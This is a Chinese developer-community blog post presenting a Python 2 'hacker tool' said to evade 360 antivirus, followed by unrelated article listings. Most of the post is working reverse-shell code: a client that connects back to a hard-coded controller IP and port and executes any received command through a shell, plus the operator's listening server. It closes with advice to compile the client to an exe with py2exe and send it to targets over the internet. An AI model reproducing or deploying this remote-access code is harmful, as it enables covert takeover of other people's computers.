AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Python写黑客小工具,360免杀

2015-12-31 3085
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

构思:

client:反向连接server,执行shell命令

server:发送命令,控制客户端


import subprocess
import socket
import threading


target="172.22.40.41"
port=55555
buffer=""


def sendMag(c_socket):
    global buffer
    
    while True:
        #send cmd
        
        if len(buffer):
            try:
                print "c_buffer>>>>", buffer
                c_socket.send(buffer)
            except:
                print "socket send error"
                
           
            print buffer
            buffer=""
            
         
            
       
            
def getMag(client_socket):
    global buffer
    
    while True:
        resc=""
        len_resc=1
        while len_resc:
            datas=client_socket.recv(4096)
            len_resc=len(datas)
            resc+=datas
            if len_resc<4096:
                break
            
            
        if not len(resc):
            res_cmd="ERROR COMMAND"
        res_cmd=cmd(resc)
        try:
            
            if not len(res_cmd):
                res_cmd="NO MAG"
                
                
            buffer+=res_cmd
            
        except:
            print "soc send reeor"
            
        
            
        


def c_rec():
    global target
    global port
    client_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        
        client_socket.connect((target,port))
    except:
        print "SOCKET CONNECT FAILED"
    
    
    
    
    get_thread=threading.Thread(target=getMag,args=(client_socket,))
    get_thread.start()
    send_thread=threading.Thread(target=sendMag,args=(client_socket,))
    send_thread.start()
    

def cmd(str):
    str=str.rstrip()
    try:
        
        res_cmd=subprocess.check_output(str,shell=True)
        
    except:
        res_cmd="ERROR COMMEND!!"
        
    if not len(res_cmd):
        res_cmd="ERROR BACK"
        
    return res_cmd



def main():
    c_rec()


main()

import socket
import threading


target="0.0.0.0"
port=55555


def s_loop():
    global target
    global port
    server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server.bind((target,port))
    
    server.listen(5)
    while True:
        c_socket,addr=server.accept()
        print "A Client Connect"
        
        
        send_thread=threading.Thread(target=sendMag,args=(c_socket,))
        send_thread.start()
    
        get_thread=threading.Thread(target=getMag,args=(c_socket,))
        get_thread.start()



    
    

def sendMag(c_socket):
    while True:
        #send cmd
        
        command=raw_input("#")
        try:
           
            if  len(command):
                c_socket.send(command)
                
        except:
            print "server send error"
        



def getMag(c_socket):
    while True:
        #get mag from client  
        recvs=""   
        
        len_rec=1
        while len_rec:
            datas=c_socket.recv(4096)
            
            len_rec=len(datas)
            recvs+=datas
            if len_rec<4096:
                break
            
           
        print "get from Catc::",recvs
        


    


def main():
    s_loop()



main()

可以用py2exe生成exe执行文件,发给测试者,如果有域名就更好了,可以在外网使用。


文章标签:
Python
安全
Shell
SoC
关键词:
Python工具
Python小工具
蓝企鹅lo
目录
相关文章
XIAZHI
|
7天前
|
JavaScript 前端开发 开发者
探索 DrissionPage: 强大的Python网页自动化工具
DrissionPage 是一个基于 Python 的网页自动化工具,结合了浏览器自动化的便利性和 requests 库的高效率。它提供三种页面对象:ChromiumPage、WebPage 和 SessionPage,分别适用于不同的使用场景,帮助开发者高效完成网页自动化任务。
XIAZHI
51 4
众所周知
|
20天前
|
JSON 安全 数据安全/隐私保护
Python安全守护神:OAuth与JWT,让黑客望而却步的魔法阵🧙‍♂️
在网络世界中,数据安全至关重要。本文介绍了如何在Python环境中使用OAuth 2.0和JSON Web Tokens (JWT) 构建安全的认证系统。OAuth 2.0是一种开放标准授权协议,允许客户端在不暴露用户凭证的情况下访问资源。JWT则是一种轻量级的数据交换格式,用于在各方之间安全地传输信息。结合两者,可以构建出既安全又高效的认证体系。文章通过Flask-OAuthlib和PyJWT库的示例代码,详细展示了实现过程。
众所周知
35 2
众所周知
|
29天前
|
数据采集 数据可视化 数据挖掘
R语言与Python:比较两种数据分析工具
R语言和Python是目前最流行的两种数据分析工具。本文将对这两种工具进行比较,包括它们的历史、特点、应用场景、社区支持、学习资源、性能等方面,以帮助读者更好地了解和选择适合自己的数据分析工具。
众所周知
30 2
肥猪肥猪-17824
|
29天前
|
C语言 开发者 Python
探索Python中的列表推导式:简洁而强大的工具
【10月更文挑战第21天】在Python的世界里,代码的优雅与效率同样重要。列表推导式(List Comprehensions)作为一种强大而简洁的工具,允许开发者通过一行代码完成对列表的复杂操作。本文将深入探讨列表推导式的使用方法、性能考量以及它如何提升代码的可读性和效率。
肥猪肥猪-17824
14 1
龙大吉
|
1月前
|
自然语言处理 算法 数据挖掘
探讨如何利用Python中的NLP工具,从被动收集到主动分析文本数据的过程
【10月更文挑战第11天】本文介绍了自然语言处理(NLP)在文本分析中的应用,从被动收集到主动分析的过程。通过Python代码示例,详细展示了文本预处理、特征提取、情感分析和主题建模等关键技术,帮助读者理解如何有效利用NLP工具进行文本数据分析。
龙大吉
49 2
bruce刘晓伟-18435
|
1月前
|
测试技术 Python
Python MagicMock: Mock 变量的强大工具
Python MagicMock: Mock 变量的强大工具
bruce刘晓伟-18435
46 4
众所周知
|
1月前
|
JSON 安全 数据安全/隐私保护
Python安全守护神:OAuth与JWT,让黑客望而却步的魔法阵🧙‍♂️
【10月更文挑战第2天】在网络世界中,数据安全至关重要。本文以教程形式介绍如何在Python环境中使用OAuth 2.0和JSON Web Tokens (JWT) 构建安全认证系统。OAuth 2.0 作为一种开放标准授权协议,允许客户端安全访问资源;JWT 则用于安全传输信息。二者结合可构建高效且安全的认证体系。文中详细介绍了OAuth 2.0 的工作流程及如何使用Flask-OAuthlib实现认证;并通过PyJWT库展示了JWT的生成与验证方法。最后探讨了两者结合使用的具体实践,旨在为开发者提供全面的认证解决方案。随着技术发展,这两种技术将继续在认证领域发挥重要作用。
众所周知
39 4
东方睿赢
|
1月前
|
安全 网络协议 网络安全
Python Socket编程大揭秘:从菜鸟到黑客的进阶之路,你准备好了吗?
【10月更文挑战第4天】在编程领域,Python Socket编程犹如一把开启网络世界的钥匙,带领开发者从简单数据传输迈向复杂应用构建。本文将引导你从零开始,逐步掌握Socket编程的核心技巧,包括基本概念、TCP服务器与客户端的搭建、并发处理及异常管理、SSL/TLS加密通信,直至深入了解网络协议与安全漏洞。通过实战演练与理论学习,助你成为驾驭网络世界的高手。
东方睿赢
35 1
游客qsxez56gggwqy
|
1月前
|
存储 Python
python数据类型、debug工具(一)
python数据类型、debug工具(一)
游客qsxez56gggwqy
43 4
我不是游客20240119
|
26天前
|
C语言 Python
探索Python中的列表推导式:简洁而强大的工具
【10月更文挑战第24天】在Python编程的世界中,追求代码的简洁性和可读性是永恒的主题。列表推导式(List Comprehensions)作为Python语言的一个特色功能,提供了一种优雅且高效的方法来创建和处理列表。本文将深入探讨列表推导式的使用场景、语法结构以及如何通过它简化日常编程任务。
我不是游客20240119
13 0

热门文章

最新文章

  • 1
    手把手教你用Python实践深度学习
  • 2
    3、Python与设计模式--建造者模式
  • 3
    Python自动化:根据模板批量生成含指定数据的word文档
  • 4
    Python编程:elasticsearch库操作Elasticsearch
  • 5
    Python中参数多个值的表示法
  • 6
    测试Flask+PYTHON的WEB框架
  • 7
    基于深度学习的动物识别系统(YOLOv5清新界面版,Python代码)
  • 8
    8.python之上下文管理协议
  • 9
    第2天,Python基础
  • 10
    Foundations of Python Network Programming - 读书笔记系列(1) - Low-Level Networking
  • 1
    LabVIEW和Python开发微细车削控制系统
    55
  • 2
    使用 Python 访问数据库的基本方法
    62
  • 3
    在Python Web开发中,测试是一个至关重要的环节
    173
  • 4
    Playwright安装与Python集成:探索跨浏览器测试的奇妙世界
    129
  • 5
    神器!使用Python 轻松识别验证码
    1052
  • 6
    【Python进阶(七)】——Series数据结构
    167
  • 7
    【Python进阶(六)】——随机数与数组
    69
  • 8
    【Python进阶(五)】——模块搜索及工作目录
    42
  • 9
    【Python进阶(四)】——魔术命令
    22
  • 10
    【Python进阶(三)】——面向对象编程
    46

    • 相关课程

    更多
  • Python Web开发基础
  • Python开发基础入门
  • Python常用数据科学库
  • Python网络爬虫实战
  • Python完全自学手册图文教程
  • Python基础快速入门实战教程

    • 相关电子书

    更多
  • From Python Scikit-Learn to Sc
  • Data Pre-Processing in Python:
  • 双剑合璧-Python和大数据计算平台的结合

    • 相关实验场景

    更多
  • 用Python画圣诞树
  • Python选择及循环结构
  • 云端Python及基本操作
  • Python网络通信程序典型应用
  • Python新手入门(Anolis OS)
  • Python新手入门

    • 推荐镜像

    更多
  • python-release
  • nodejs-release
  • pypi
    • 下一篇
    无影云桌面